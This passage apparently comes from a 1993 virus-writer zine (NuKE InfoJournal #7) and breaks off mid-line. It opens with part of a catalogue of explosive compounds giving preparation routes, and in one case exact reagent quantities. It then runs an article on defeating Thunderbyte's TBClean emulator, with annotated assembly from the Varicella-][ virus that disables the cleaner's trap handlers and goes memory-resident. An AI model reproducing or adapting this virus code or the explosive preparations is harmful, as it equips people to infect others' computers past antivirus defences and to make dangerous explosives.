2.2 c. One volume of water will dissolve more than 100 volumes Cl2O with formation of HClO. Explosive Properties: Explodes on contact with organic material. Can also be cause to explode by a spark or by heating. Manufacture: Prepared from yellow mercuric oxide and chlorine. Use: Chlorinating agent. Toxicity (if known): Intensely irritating to eyes, skin, mucous membranes, respiratory tract. ----------------------------------------------------------------------------- Entry: 7 Name: Cyanogen Azide IUPAC Name: Carbon pernitride Condensed Formula: CN4 / (N-)=(N+)=N-CN Physical Properties: Clear colorless oily liquid. Half-life of a 27% solution in acetonitrile (stabalizer) is 15 days at room temp, more stable at lower temps. Can be handled relativly safely in solvents. Explosive Properties: The pure azide detonates violently upon thermal, electrical or mechanical shock. Manufacture: Prepared by suspending NaN3 in dry acetonitrile and distilling cyanogen chloride into the cooled suspension. Use: In organic synthesis. Toxicity (if known): Assumed to be toxic. ----------------------------------------------------------------------------- Entry: 8 Name: Diazoacetic Ester IUPAC Name: Ethyl diazoacetate Condensed Formula: C4H6N2O2 / (N-)=(N+)=CHCOOC2H5 Physical Properties: Yellow oil. Pungent odor. Very volitile. mp -22 c. Slightly soluble in water. Explosive Properties: This substance is very explosive. Distillation, even under reduced pressure, is dangerous. Explodes on contact with concentrated H2SO4 Manufacture: Prepared by the action of sodium nitrite on glycine ethyl ester hydrochloride. Use: N/A Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 9 Name: Diazomethane IUPAC Name: Azimethylene Condensed Formula: CH2N2 / CH2=(N+)=(N-) Physical Properties: Yellow gas. mp -145 c, bp -23 c. Copper powder and solid calcium chloride causes active decomposition with the evolution of nitrogen and the formation of insoluble white flakes of polymethylene (CH2). Explosive Properties: The undiluted liquid and concentrated solutions may explode violently, especially if impurities are present. Gaseous diazomethane may explode on heating to 100 c or on rough glass surfaces. Alkali metals also produce explosions with diazomethane. Manufacture: Prepared from chloroform and hydrazine by reaction with potassium hydroxide; from KOH and nitrosomethyl- urea. These methods yield gaseous diazomethane. The following procedures yield ether solutions of diazomethane. From N-nitroso--methylaminoisobutyl methyl ketone in ether and isopropanol by reaction with sodium isopropoxide or from the same ketone in ether by reaction with sodium cyclohexoxide. In the laboratory diazomethane may be prepared most simply by the action of alkali on the commercially available N-methyl-N-nitroso-N'-nitroguanidine. Use: Powerful methylating agent for acidic compounds such as carboxylic acids, phenols, enols. Toxicity (if known): Very toxic. Insidious poison (a well ventilated hood is absolutely necessary), avoid vapor. Strong irritant. Does not cause discernible reaction at the time of contact, but later even in minute amounts, produces an inflammatory reaction. Hypersensitivity results which makes it impossible to work with diazomethane without attacks of asthma and associated symptoms. ----------------------------------------------------------------------------- Entry: 10 Name: 2,4-Dinitroresorcinol IUPAC Name: 2,4-Dinitro-1,3-benzenediol Condensed Formula: C6H4N2O6 Physical Properties: Yellow crystals, mp 146-148 c. Very slightly soluble in cold water or alcohol. Explosive Properties: Explodes when stongly heated. Manufacture: --Can be bought commercially (through chem company). Use: For dyeing fabrics mordanted with iron a green color. As a reagent for Co (brown-red ppt) and for Fe (olive green color). Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 11 Name: Erythrityl Tertranitrate IUPAC Name: (R*,S*)-1,2,3,4-Butane-tetroltetranitrate Condensed Formula: C4H6N4O12 Physical Properties: Leaflets from alcohol, mp 61 c. Soluble in alcohol, ether, glycerol. Insoluble in water. Explosive Properties: Explodes on percussion. Manufacture: Made by the nitration of erythritol Use: Coronary vasodilator. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 12 Name: Ethyl Ether IUPAC Name: 1,1'-Oxybisethane Condensed Formula: C4H10O / C2H5OC2H5 Physical Properties: Mobile, very heave flammable liquid. Vapor heavier than air. Characteristic, sweetish, pungent odor, more agreeable than chloroform. Burning taste. mp -116.3 (stable crystals)/-123.3 (metastable crystals). Air-ether mixture containing more than 1.85 volume-% of ether vapor are explosive hazards. Explosive Properties: Ethyl Ether is not explosive in itself, but when dried tends to forms highly explosive percussion, heat, and friction sensitive peroxides. Manufacture: Produced on a large scale by dehydration of ethanol or by hydration of ethylene, both processes being carried out in the presence of sulfuric acid. Use: In the manufacture of gunpower. As a primer in gasoline engines. Solvent for waxes, fats, oils, perfumes, etc. Easily removable extractant of tissues. Toxicity (if known): Mildy irritating to skin, mucous membranes. Inhalation of high concentrations causes narcosis, unconsciousness. Death may occur due to respiratory paralysis. ----------------------------------------------------------------------------- Entry: 13 Name: Fluorine Nitrate IUPAC Name: Nitroxy fluoride Condensed Formula: FNO3 / FONO2 Physical Properties: Colorless gas. Moldy acrid odor. mp -175 c, bp -45.9 c. Soluble in acetone. Powerful oxidizing agent. Explosive Properties: The liquid explodes on slight percussion. Manufacture: Prepared by the action of fluorine on nitric acid. Use: Oxidizing agent in rocket propellants. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 14 Name: Fluorine Perchlorate IUPAC Name: Chlorine tetroxyfluoride Condensed Formula: ClFO4 / FOCLO3 Physical Properties: Colorless gas. Pungent, acrid odor. mp -167.3 c, bp -15.9 c. Explosive Properties: Explodes on the slightest provocation, i.e., on contact with rought surfaces, dust, grease, rubber, on melting, distilling, etc. Manufacture: Prepared by passing fluorine over cold 72% aqueous perchloric acid in platinum apparatus. Use: N/A Toxicity (if known): Attacks the lungs even in traces. ----------------------------------------------------------------------------- Entry: 15 Name: Gold, Explosive IUPAC Name: "Fulminating Gold" Condensed Formula: N/A Physical Properties: Dark brown powder. Explosive Properties: Explodes on heating or rubbing to give gold, nitrogen and ammonia. The exact composition of the compound is unknown since it is too explosive to be dried. Therefore the only elements that can be determined are gold, nitrogen, and chlorine. Manufacture: Obtained by the action of ammonia on auric chloride or ammonium chloride on auric oxide. Use: N/A Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 16 Name: Hydroxylamine IUPAC Name: Hydroxylamine Condensed Formula: H3NO / NH2OH Physical Properties: Unstable large white flakes or needles, mp 33 c, bp 58 c. Very soluble in water, liquid ammonia and methanol. Explosive Properties: Detonates in test tube heated with flame. Manufacture: N/A Use: As reducing agent in photography; in synthesis and analytical chemistry; to purify aldehydes and ketones. As antioxidant for fatty acis and soaps. As dehairing agent for hides. Toxicity (if known): Skin irritant. May cause methemoglobinemia, sulfhemoglobinemia, cyanosis, convulsions, hypotension and coma. ----------------------------------------------------------------------------- Entry: 17 Name: Isopropyl Ether IUPAC Name: 2,2'-Oxybis[propane] Condensed Formula: C6H14O Physical Properties: Liquid. mp -60 c, bp 68-69 c. Explosive Properties: Isopropyl Ether is not explosive in itself, but when unstabalized with p-benzylaminophenol it tends to forms highly explosive percussion, heat, and friction sensitive peroxides. Manufacture: N/A. Safer to buy through a chemical company. Use: N/A Toxicity (if known): Mildy irritating to skin, mucous membranes. Inhalation of high concentrations causes narcosis, unconsciousness. Death may occur due to respiratory paralysis. ----------------------------------------------------------------------------- Entry: 18 Name: Lead Azide IUPAC Name: Lead Azide Condensed Formula: N6Pb / Pb(N3)2 Physical Properties: Needles or white powder. Heat of formation at 25 c: +110.5 kcal/mol. Explosive Properties: Explodes at 350 c or on percussion. Manufacture: Prepared from sodium azide and lead nitrate. Use: As a primer in explosives. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 19 Name: Mannitol Hexanitrate IUPAC Name: Mannitol nitrate Condensed Formula: C6H8N6O18 Physical Properties: Long needles in regular clusters. mp 106-108 c. Soluble in alcohol, insoluble in water. Explosive Properties: Explodes on percussion. It is stable at ordinary tempatures so that it may be used commercially, but it is distinctly less stable than nitroglycerol at 75 c or above. Manufacture: Nitration of mannitol. Use: Vasodilator. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 20 Name: Mercuric Oxycyanide IUPAC Name: Mercury cyanide oxide Condensed Formula: C2Hg2N2O / HgO.Hg(CN)2 Physical Properties: White, orthorhombic crystals or crystal powder. Explosive Properties: It explodes when touched with a flame or by percussion. Manufacture: N/A. Cheaper and easier to buy as a mixture of 33% mercuric oxycyanide and 67% mercuric cyanide from a chemical company. Use: Topical antiseptic. Toxicity (if known): Violent poison. ----------------------------------------------------------------------------- Entry: 21 Name: Methyl Nitrate IUPAC Name: Nitric acid methyl ester Condensed Formula: CH3NO3 / CH3ONO2 Physical Properties: Liquid. Solid at -83 c, bp 64.6 c. Slightly soluble in water. Soluble in alcohol, ether. Explosive Properties: When methyl nitrate reaches it boiling point, it will explode. Manufacture: Prepared from methanol and nitric acid in the presence of sulfuric acid. Use: Has been used as a rocket propellant. Does not need external oxygen for combustion. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 22 Name: Nitramine, Tetralite, Tetryl. IUPAC Name: N-Methyl-N,2,4,6-tetranitrobenzenamine Condensed Formula: C7H5N5O8 / (NO2)3C6H2N(CH3)NO2 Physical Properties: Yellow crystals. Density of 1.57. mp 130-132 c. Insoluble in water, soluble in alcohol. Explosive Properties: Explodes at about 180-190 or on detonation. Manufacture: N/A Use: As a pH indicator. Also in explosives. Toxicity (if known): Irritating to skin and mucous membranes. Causes yellow staining to skin and hair. ----------------------------------------------------------------------------- Entry: 23 Name: Nitrogen Chloride IUPAC Name: Nitrogen trichloride Condensed Formula: Cl3N / NCl3 Physical Properties: Yellow, thick, oily liquid. Pungent odor, evaporates rapidly in air. Very unstable. Insoluble in water. Explosive Properties: Explodes when heated to 93 c, subjected to a flash of direct sunlight or magnesium liquid, sealed in a glass container at 60 c after 13 seconds, frozen in liquid air and thawed in vacuo, in contact with ozone, nitric oxide, grease, and several organic substances. Manufacture: Prepared by the action of chlorine gas on ammonium salts, or by eletrolyzing an acidified solution of ammonium chloride. Use: Bleaching of flour (prohibited in the U.S.A.), wastage control of citrus fruit. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 24 Name: Nitrogen Selenide IUPAC Name: Selenium nitride Condensed Formula: N4Se4 Physical Properties: Orange-red , amorphous powder or monoclinic crystals. density 4.2. Very hygroscopic. Insoluble in water. Explosive Properties: Explosive. Assumingly when quickly heated or struck. Manufacture: Prepared by passing dry ammonia over selenium tetrachloride; by treating a dilute solution of selenium oxychloride in benzene with dry ammonia and washing the precipitate with water and potassium cyanide; by the action of dry ammonia on a dilute solution of selenium monochloride in carbon disulfide; by the action of dry ammonia on diethyl selenite or dimethyl selenite dissolved in benzene and washing with potassium cyanide; by reacting anhydrous, liquid ammonia with selenium dioxide. Use: N/A Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 25 Name: Nitroguanidine IUPAC Name: Nitroguanidine Condensed Formula: CH4N4O2 / H2NC(NH)NHNO2 Physical Properties: Needles, prisms from water. One litre of water dissolves 4.4 grams at 25 c. Slightly soluble in methanol. Explosive Properties: Explosive of moderate power. Can only be exploded with a detonator. Manufacture: Prepared by the action of concentrated H2SO4 on guanidine nitrate. Use: Intermediate in the synthesis of pharmaceuticals. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 26 Name: Pentaerythritol Tetranitrate, PETN IUPAC Name: 2,2-Bis[(nitrooxy)-methyl]-1,3-propanediol dinitrate (ester) Condensed Formula: C5H8N4O12 Physical Properties: Soluble in acetone. Insoluble in water. Explosive Properties: Explodes on percussion. More sensitive to shock than TNT. Manufacture: Prepared by the nitration of pentaerythritol. Use: Mainly in the manufacture of detonating fuse (Primacord). Also as a vasodilater. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 27 Name: Pentrinitrol IUPAC Name: 2,2-Bis[(nitrooxy)methyl]-1,3-propanediol mononitrate (ester) Condensed Formula: C5H9N3O10 Physical Properties: Viscous liquid. mp 32 c. Very soluble in ethanol. Explosive Properties: Explodes on percussion. More sensitive to shock than TNT. Manufacture: N/A Use: Vasodilator. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 28 Name: Pentryl IUPAC Name: 2-[Nitro(2,4,6-trinitrophenyl)amino]-ethanol nitrate (ester) Condensed Formula: C8H6N6O11 Physical Properties: Small, cream colored crystals. mp 129 c. Explosive Properties: Explodes when heated to 235 c, or upon detonation. Manufacture: Prepared by the nitration of 2,4-dinitrophenylamino- ethanol Use: High explosive. Base charge in detonaters. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 29 Name: Peracetic Acid IUPAC Name: Ethaneperoxoic acid Condensed Formula: C2H4O3 / CH3COOOH Physical Properties: Liquid. Acrid odor. Freely soluble in water. Stable in a dilute aqueous solution. Explosive Properties: Explodes violently upon heating to 110 c. Manufacture: Prepared from acetaldehyde and oxygen in the presence of cobalt acetate; by the autooxidation of acetaldehyde. A 50% solution may be obtained from acetic anhydride, hydrogen peroxide, and sulfuric acid. Use: N/A Toxicity (if known): Strongly irritating to skin and eyes. ----------------------------------------------------------------------------- Entry: 30 Name: Performic Acid IUPAC Name: Methaneperoxoic acid Condensed Formula: CH2O3 / HCOOOH Physical Properties: The 90% solution is a colorless liquid. Soluble in chloroform, benzene. Solutions are unstable, gassing begin noticeable after a few hours. Explosive Properties: Prone to explode on contact with metals, their oxides, reducing substances, or on distillation. Manufacture: A 90% solution is obtained when a mixture of 20 g formic acid, 25g 100% H2O2, and 6.5 g H2SO4 is allowed to interact for 2 hours, and is then distilled. Use: For oxidation, epoxidation and hydroxylation reations. Toxicity (if known): Irritant. ----------------------------------------------------------------------------- Entry: 31 Name: Potassium Picrate IUPAC Name: 2,4,6-Trinitrophenol potassium salt Condensed Formula: C6H2KN3O7 Physical Properties: Yellow, reddish, or greenish lustrous needles. Soluble in 200 parts cold water, 4 parts boiling water. Explosive Properties: Explodes when struck or heated. Manufacture: Prepared by reacting picric acid with potassium. Use: N/A Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 32 Name: Propargyl Nitrate IUPAC Name: 2-Ethyl-2-[(nitrooxy)methyl]-1,3-propanediol dinitrate (ester) Condensed Formula: C6H11N3O9 Physical Properties: White powder. mp 51-52 c. Readily soluble in acetone. Insoluble in water. Explosive Properties: Lowest explosive temp: 220 c. Explosive but only slightly sensitive to shock. Manufacture: N/A Use: Coronary vasodilator Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 33 Name: n-Propyl Nitrate IUPAC Name: Nitric acid propyl ester Condensed Formula: C3H7NO3 / CH3CH2CH2ONO2 Physical Properties: Pale yellow liquid. Sweet sickly odor. bp 110 c. Azetrope with water containing 75% C3H7NO3. Explosive Properties: Heating may cause it to explode. Manufacture: Prepared by the nitration of propanol with nitric acid, usually in the presence of urea and ammonium nitrate or sulfuric acid. Use: Fuel ignition promoter, in rocket fuel formulations. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 34 Name: Silver Perchlorate IUPAC Name: Silver Perchlorate Condensed Formula: AgClO4 Physical Properties: Deliquescent crystals. Freely soluble in water. Explosive Properties: These compounds explode readily when struck. Manufacture: Prepared from NOClO4 + AgBr. Use: In the explosives industry. Toxicity (if known): Irritating to skin, mucous membranes. ----------------------------------------------------------------------------- Entry: 35 Name: Tetranitromethane IUPAC Name: Tetranitromethane Condensed Formula: CN4O8 / C(NO2)4 Physical Properties: Pale yellow liquid. mp +13.8 c. Freely soluble in alcohol. Insoluble in water. Explosive Properties: Explosive in admixture with toluene. Highly explosive in the presence of impurities. Manufacture: Prepared by the nitration of acetic anhydride with anhydrous nitric acid. Use: Oxidizer in rocket propellants. To increase centane number of diesel fuels. Reagent for detecting the presence of double bonds in organic compounds. Has bee proposed as irritant war gas. Toxicity (if known): Skin and lung irritant. ----------------------------------------------------------------------------- Entry: 36 Name: Tetrasilane IUPAC Name: Tetrasilicon Condensed Formula: H10Si4 / Si4H10 Physical Properties: Liquid. mp approx -90 c, bp 109 c. Decomposes at room tempature. Explosive Properties: Explodes on exposure to air. Manufacture: Prepared by the action of hydrochloric acid on magnesium silicide. Use: N/A Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 37 Name: Tetrasulfur Tetranitride IUPAC Name: Tetrasulfur Tetranitride Condensed Formula: N4S4 Physical Properties: Orange-red, monoclinic needles. mp 178 c. Insoluble in cold water. Slightly soluble in benzene. Explosive Properties: Heating above 185 c may result in deflagration and explosion. May decompose explosivly on striking or at tempatures much above 100 c. Manufacture: Prepared by the interaction of disulfur dichloride and ammonia. Use: N/A Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 38 Name: sym-Trinitrobenzene IUPAC Name: 1,3,5-Trinitrobenzene Condensed Formula: C6H3N3O6 Physical Properties: mp 122.5 c. Trinitrobenzene is dimorphous, the other rare form melts at 61 c. Explosive Properties: Explodes when rapidly heated. Less sensitive to impact than TNT, but more powerful and brisant. Manufacture: Prepared by decarboxylation of trinitrobenzoic acid, obtained by oxidation of TNT. Use: Explosives. Toxicity (if known): N/A ----------------------------------------------------------------------------- Entry: 39 Name: Trinitromethane IUPAC Name: Trinitromethane Condensed Formula: CHN3O6 Physical Properties: Crystals, mp 15 c. Decomposes above 25 c. Soluble in water, giving an intense yellow solution, although the dry crystals are pure white. Explosive Properties: Explodes when heated rapidly. Manufacture: Prepared by nitration of acetylene with nitric acid. Prepared from tetranitromethane and K4[Fe(CN6)] in an aqueous solution. Use: In the manufacture of explosives and rocket propellants. Toxicity (if known): Slightly irritating to eyes, mucous membranes. ----------------------------------------------------------------------------- Entry: 40 Name: Uranyl Nitrate IUPAC Name: Uranyl Nitrate Condensed Formula: N2O8U / UO2(NO3)2 Physical Properties: Hexahydrate, yellow crystals; greenish luster by relected light. When shaken, rubbed, or crushed, the crystals show remarkable tribolum inescence with occasional detonations. Explosive Properties: Solutions should not be allowed to stand in sunlight as explosions may occur. Shaking, rubbing, or crushing may result in detonation. Manufacture: N/A Use: Ad intensifier in photography; manufacture uranium glaze; decorating porcelain; also as reagent in anal. chemistry. Toxicity (if known): N/A ----------------------------------------------------------------------------- Viper/NuKE =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "The Dangers of Thunderbyte's TBClean Emulation Nu Nu Techniques" KE KE -N -N By uK uK Rock Steady E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % AntiVirus Spotlight of the Issue - Thunderbyte Anti-Virus v6.04 % % DISCLAIMER % This article is concerning a study and field test of the reliability of Thunderbyte's anti-virus package. The study was conducted by Rock Steady, and this is simply a report about his extensive study of Thunderbyte's TBClean utility. This report is not intended to scare people away from Thunderbyte's anti-virus package, but rather to show you how TBClean actually works in order to clean a virus. The information here may disturb many people, nevertheless it is presented here for the safety of those who use Thunderbyte's TBClean in a home and/or business environment. % What is ThunderByte % Thunderbyte is an anti-virus package, sometimes known as TBAV for ThunderByte Anti-Virus. TBAV tries to use fairly new techniques to try to detect and clean computer viruses. In this issue of the NuKE InfoJournal, we will take a very close look at the structure of TBAV, mainly the utility TBCLEAN.EXE which is supplied in every TBAV package. TBCLEAN.EXE is a program that tries to remove viruses from your infected files by using an heuristic/emulation approach. Now, for those who don't understand what an heuristic/emulation approach is let me try to explain it to you in more simplified, less-technical terms. TBClean will try to set up a "control" environment to execute the virus. You see, many of the computer viruses today will attach themselves to binary files and alter them in such a way that when you try to execute (run) the binary file the virus will execute first and install itself into memory, and then the virus will execute the original binary file it is attached to. Now, every ????????.COM and ????????.EXE binary file contains an entry point. This is the point from which DOS to starts to execute the code. Basically it is the beginning of the program, and in order for the file to run properly we need to start at that entry point. Now *.COM files contain a FIXED entry point which is location 100h. Now if we attach a virus to the end of the COM file, we have to fix the entry point so that when executed the virus will run first. Since this is a FIXED entry point, we will go to location 100h, and put a JMP statement to jump to the entry point of the virus. For the original file to execute correctly, we will need the original three bytes at the entry point, since the JMP we put for it to jump to the virus entry point took three bytes of data in the .COM. So when the virus gives control back to the file, we then must restore the original three bytes and execute them. Now to remove the virus from the .COM file we need to know where the original three bytes are. So TBClean will actually execute the virus and try to catch the virus restoring the original three bytes. Once that happens, TBClean can safely remove the virus from the file, as it now can replace the original three bytes where the virus put its jump statement. Now .EXEs have a variable entry point, rather than a fixed one like the .COM files. Each .EXE file contains a header of about 32 bytes in the beginning of the file which has information about the .EXE itself, including the entry point. Now when a virus attaches (infects) itself to an .EXE file, it simply puts its entry point inside the .EXE header and saves the original one for later use. Again, in order to remove a file from an .EXE file, we will need to have the original entry point location. And TBClean does this by executing the virus in a controlled environment; when the virus restores control back to the .EXE file, it will jump to the entry point location. TBClean will halt at that point and attempt to clean the file. % The Problem % The problem when doing this, the virus can always escape from this controlled environment and go loose. In fact we at NuKE have attempted and succeeded in doing just that! % Explanation % When you run TBClean to disinfect a virus-infected file, it does several things in order to set up the environment needed to execute the virus. One of things that TBClean does is check to see if it is being debugged. I guess the makers of TBClean did not want people to "debug" their software in order to have a closer look because once you know how the program works you then can attempt to bypass it. The easiest way to bypass the anti-debug traps is to use a debugger package that can go TSR and put loose breakpoints. I've found that Periscope and SoftIce can easily bypass the TBClean traps, or you may set a TSR file and set it to go off on the first interrupt 21h, function 3Dh (DOS Open File). The next main trick TBClean does is that it occupies all of the remaining memory left in the system. TBClean only requires about 20k for itself, but nevertheless it will occupy all the remaining memory left in the system. It will use this memory for the file it will attempt to clean, but not all of the memory is really needed, nevertheless it is occupied. Why? Well, because TBClean wants to set-up a secure environment to run the virus and by occupying all the available memory if the virus gets out of hand it CAN'T go resident because there is no more memory left! "Pretty smart," you must be saying to yourself? Yes, it is a good idea to occupy all of the memory, so like even if the virus tries to allocate memory it will get an error and it will quit. The next trick, before TBClean actually executes the virus in the controlled environment is that it will make two copies of the interrupt vector table. This too is a good idea, because if a virus does manage to escape and hook the vector table, TBClean will notice the vector table change and restore it with the original value. Therefore, if a virus was to "get out" of this controlled TBClean environment we would need to hook all three copies of the vector tables (DOS + the two copies that TBClean makes). After this, we are pretty much ready to try to make a disinfection via emulation. Of course TBClean turns on the Trap flag, and uses Int 0h, 1h, 3h, and 4h to do the actual tracing. The interrupt that we REALLY need to pay attention to is Int 1h. Why? Well, when Intel built the first 80x86 (the 8086) they added what we call a Trap Flag. Normally this flag is off, and the processor executes every line of code without stoping. But when the trap flag is on, the processor will issue an Int 1h call after every line of code executed. Therefore, after every line of code is executed the processor will issue an Int 1h, which TBClean quietly awaits -- then it can actually analyze the code line by line. There are a few restrictions that TBClean enforces; one of them is the Trap flag must always be on! If you try to turn off the Trap flag, TBClean will fool the virus into thinking the Trap flag is off, but it really stays on. Secondly, interrupt calls are not allowed. Thirdly, it will never give you the true vector address of Int 1h or Int 3h -- it gives you a fake value instead. Finally, TBClean will NOT allow the virus to have its segment in the DS or ES registers, meaning that if TBClean resided in location 0ABC:0000, the value 0ABC is never allowed to go in the DS or ES registers of the virus. This is done so the virus is not able to snoop inside TBClean. % Making a virus to bypass TBClean % After I had successfully taken apart TBClean, and once I understood exactly how it worked, then I was ready to write a virus to defeat TBClean's dangerous emulation techniques. Don't get me wrong, TBClean has a great idea going, but it contains too many flaws that must be tightened up. And apparently those flaws can lead to the destruction of your PC. Just think about it. Let's say you just downloaded a file from your local BBS, and you used TBSCAN to scan the new file for viruses, before you attempt to execute it. Lets say the file is infected with a virus like Varicella-][, which can bypass TBClean. Now if TBSCAN reported a virus, wouldn't you naturally try to clean it so you could perhaps use the file? Of course you would, and what program would you use to do the job? Nothing but TBClean! Picture it, your computer is not infected by any virus, you are pretty much happy about yourself for using TBSCAN and detecting that virus inside that file you just downloaded. Your glad you got it before it infected your computer. Or lets say you got TBScanX resident, and it caught the virus, just as you attempt to executed it... You now try to clean the file with TBClean. TBClean does what it has to do, looks at the file and then tries emulation to disinfect it. After emulation TBClean reports no viruses found, and tells you that it may not even be infected with a virus. You're puzzled? Well, actually TBClean just unleased the virus into your system! Now who's to blame? Personally, I think it's the incompetent programmers of TBClean. It allowed too many loopholes in their program, and the Varicella-][ virus just took advantage of those loopholes and is now resident in your computer, ready to infect every file you touch. Remember, it is also a very fast, stealthy virus. Personally, if _any_ anti-virus program should attempt to disinfect via emulation, it must be EXTREMELY cautious, and it should take every possible loophole into account. Remember, emulation means that you are actually executing the virus in order to disinfect it. Many people didn't know that, but TBClean executes (RUNS) the virus! How Satanic! Thunderbyte should praise NuKE for testing their software and showing them their flaws, so that they may do whatever is necessary to fix this problem. It is fortunate for Thunderbyte that no "evil" virus writer has noticed this problem and took advantage of it. It would have cost Thunderbyte their name and market share. Anyhow, enough with Thunderbyte, this package has enough flaws. It is sad that Thunderbyte rated very low under NuKE's personal attack tests in several fields. Thunderbyte reported too many false positives, meaning it screamed *VIRUS* when no virus was present. It is enough that the average computer user is paranoid about viruses, but if you "cry wolf" too many times people lose hope in the package. Thunderbyte was incapable of working in a DOS Window shell, in SCO Unix, and under OS/2. This seems to be because TBSCAN uses its own file routines, instead of DOS's. Thunderbyte is also not very user friendly -- 4 out of 5 moms found this package too difficult to use. A Windows version of Thunderbyte could be a great plus. % And in this corner...Varicella-][ % Let's go into detail with parts of the Varicella-][ virus and let's show you why it works. 1 mov byte ptr cs:[tb_here][bp],00h ;Reset TB flag 2 xor dx,dx ;dx=0 3 mov ds,dx ;ds=0 4 mov ax,word ptr ds:[0006h] ;ax=0000:0006 segment of 5 dec ax 6 mov ds,ax Okay, after looking at the above we begin by resetting our TB flag. TBClean will not give us the complete address of Int 1h. It will only give us the correct segment, the offset is no good. Therefore let's simply take the segment. Now we know the segment location of TBClean in memory, since TBClean will not let me store the value in DS, let's subtract 1 and *then* store it in DS. We have again fooled TBClean; maybe we can't have TBClean's correct segment in DS, but by subtracting 1 and adding 16 to IP, we get the exact location. In the next block of code, we will search 64k of TBClean's memory in order to find the Int 1h and 3h offsets and the two copies of the vector table. This is the bit of data we will be searching for. ====================Somewhere in TBClean.EXE==v6.04=================== 1 cs:04A4 33C0 xor ax,ax 2 cs:04A6 8ED8 mov ds,ax 3 cs:04A8 8BF8 mov si,ax 4 cs:04AA BF342D mov di,2D34 5 cs:04AD B90002 mov cx,0200 6 cs:04B0 F3A5 rep movsw [The above block is coping the vector table (0000:0000) to location ES:DI (ES:2D34). This value we will need.] 7 cs:04B2 FA cli 8 cs:04B3 C70600005411 mov word ptr [0000],1154 9 cs:04B9 8C0E0200 mov [0002],cs 10 cs:04BD C7060400E513 mov word ptr [0004],13E5 11 cs:04C3 8C0E0600 mov [0006],cs 12 cs:04C7 C7060C006B15 mov word ptr [000C],156B 13 cs:04CD 8C0E0E00 mov [000E],cs 14 cs:04D1 C70610005411 mov word ptr [0010],1154 15 cs:04D7 8C0E1200 mov [0012],cs 16 cs:04DB C70614005411 mov word ptr [0014],1154 17 cs:04E1 8C0E1600 mov [0016],cs 18 cs:04E5 C70618005411 mov word ptr [0018],1154 19 cs:04EB 8C0E1A00 mov [001A],cs 20 cs:04EF C7066C002411 mov word ptr [006C],1124 21 cs:04F5 8C0E6E00 mov [006E],cs 22 cs:04F9 FB sti [The above block is hooking the vector table. This is were we get our Int 1h and 3h location.] 23 cs:04FA 8BF0 mov si,ax 24 cs:04FC 8BF8 mov di,ax 25 cs:04FE 2E8E06F032 mov es,cs:[32F0] 26 cs:0503 B90080 mov cx,8000 27 cs:0506 F3A5 rep movsw [The above block copies 8000 bytes (vector table, CMOS, BIOS, etc.) into the segment which is in location CS:32F0. We will need to get this location to hook the interrupts.] ===========================END of TBClean============================= Now, the bellow block will start to search for the above block in memory where we will scan 64k from the segment we got. mov cx,0FFFFh ;cx=64k mov si,dx ;si=0 look_4_TBClean: mov ax,word ptr ds:[si] xor ax,0A5F3h [You could do a "CMP WORD PTR DS:[SI],0A5F3h", I just wanted to be sneaky because TBClean will find out what I'm doing and fool around with the flag and my test will fail! As you can see, we are looking for the bytes from line #6. We search by REVERSE-BIT format! To find F3A5 we search with A5F3.] je check_it ;jmp if its TBClean look_again: inc si ;if not continue looking loop look_4_TBClean jmp not_found ;not found cont normal [If A5F3 is found, we continue with the bottom, which will search for more bytes in that block captured above. These bytes that we are searching for exist in all version of TBClean v6.00-6.04. I haven't test bellow v6.00, but it should work!] check_it: mov ax,word ptr ds:[si+4] xor ax,0006h jne look_again ;jmp =! TBClean mov ax,word ptr ds:[si+10] xor ax,020Eh jne look_again ;jmp =! TBClean mov ax,word ptr ds:[si+12] xor ax,0C700h jne look_again ;jmp =! TBClean mov ax,word ptr ds:[si+14] xor ax,0406h jne look_again ;jmp =! TBClean [If all the bytes match, it means we found TBClean in memory, and since we know where we are, we can steal the Int 1h & 3h locations, like we do bellow.] mov bx,word ptr ds:[si+17] ;steal REAL int 1 offset [Now that we have the offset of Int 1h in BX, replace the first byte at Int 1h handler with CF (IRET), making the handler Useless! NOTE: we are adding 16 to the offset because the segment is really DS - 1, so to counter act the segment we add 16 to the offset. (16 bytes = 1 segment)] mov byte ptr ds:[bx+16],0CFh ;replace with IRET [Same is done for Int 3h bellow.] mov bx,word ptr ds:[si+27] ;steal REAL int 3 offset mov byte ptr ds:[bx+16],0CFh ;replace with IRET [TBClean is OFFICIALLY DEAD! Congrats, now lets turn on the flag, cause we found TBClean, and let's go resident] mov byte ptr cs:[tb_here][bp],01h ;set the TB flag on [The next block gets the segment of where the 2nd copy of the vector table is hiding (line #25 in TBClean capture)!] mov bx,word ptr ds:[si+51h] ;get 2nd segment of ints mov word ptr cs:[tb_int2][bp],bx ;vector table [The next block gets the offset of the 1st copy of the vector table that TBClean did (line #4 in TBClean capture).] mov bx,word ptr ds:[si-5] ;get offset of 1st copy mov word ptr cs:[tb_ints][bp],bx ;of vector table [Now we can get the real Int 21h, 13h,and 1Ch locations from the vector table.] not_found: xor dx,dx push ds mov ds,dx ;put that in ds les si,dword ptr ds:[0084h] ;get int21 vector mov word ptr cs:[int21][bp],si ;save int21 offset mov word ptr cs:[int21+2][bp],es ;save int21 segment les si,dword ptr ds:[0070h] ;get int1c vector mov word ptr cs:[int1c][bp],si ;save int1c offset mov word ptr 